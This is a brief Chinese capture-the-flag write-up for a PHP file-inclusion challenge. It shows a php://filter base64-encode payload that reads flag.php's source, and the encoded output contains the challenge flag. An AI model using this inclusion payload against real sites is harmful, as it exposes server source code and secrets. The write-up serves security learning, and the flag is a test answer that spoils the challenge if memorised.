打开题目:
就一个tips
看看源码:
奥,file=flag.php
而且再看题目:include
应该是文件包含漏洞,是一道php伪协议题目
-.-PHP伪协议-.-:
我们通过 php://filter 来获取源码:
构造payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php就可以得到base64编码后的flag.php:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7N2M3MTA2NjMtYzllZi00YjBlLWI2ODctZTRjNjU5YTdiODE2fQo=
利用 CyberChef 进行解码:
得到flag.php的内容:
即可得到flag。
